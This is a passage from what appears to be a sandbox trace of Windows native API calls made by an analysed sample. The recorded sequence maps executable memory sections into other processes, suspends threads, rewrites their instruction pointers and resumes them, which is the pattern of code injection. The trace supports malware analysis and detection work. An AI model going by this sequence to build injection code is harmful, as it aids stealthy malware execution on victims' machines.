BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0xb5200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x3160000, SectionOffset=0x0, ViewSize=0x19e6b0*=0xb6000) returned 0x0 [0195.628] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xbc, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0xb5200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x910000, SectionOffset=0x0, ViewSize=0x19e6ec*=0xb6000) returned 0x0 [0195.637] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x3160000) returned 0x0 [0195.640] NtClose (Handle=0x10c) returned 0x0 [0195.640] NtSetContextThread (ThreadHandle=0x104, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x46f900, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x46f8a8, Eip=0x932707, SegCs=0x23, EFlags=0x246, Esp=0x46f88c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.641] NtResumeThread (in: ThreadHandle=0x104, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0195.641] NtClose (Handle=0xbc) returned 0x0 [0195.641] NtClose (Handle=0x104) returned 0x0 [0195.642] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0x8d4, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x104) returned 0x0 [0195.642] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0195.643] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0195.643] NtReadVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0195.643] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0195.659] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0x8dc) | out: ThreadHandle=0x19ea68*=0xbc) returned 0x0 [0195.659] NtSuspendThread (in: ThreadHandle=0xbc, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0195.659] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x104, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x1f20000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0195.667] NtGetContextThread (in: ThreadHandle=0xbc, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x30fc80, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x30fc28, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x30fc0c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0195.668] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0195.668] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x145200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x146000) returned 0x0 [0195.680] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x145200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x28f0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x146000) returned 0x0 [0195.707] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x32a0000) returned 0x0 [0195.717] NtClose (Handle=0x10c) returned 0x0 [0195.717] NtSetContextThread (ThreadHandle=0xbc, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x30fc80, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x30fc28, Eip=0x29a2707, SegCs=0x23, EFlags=0x246, Esp=0x30fc0c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, 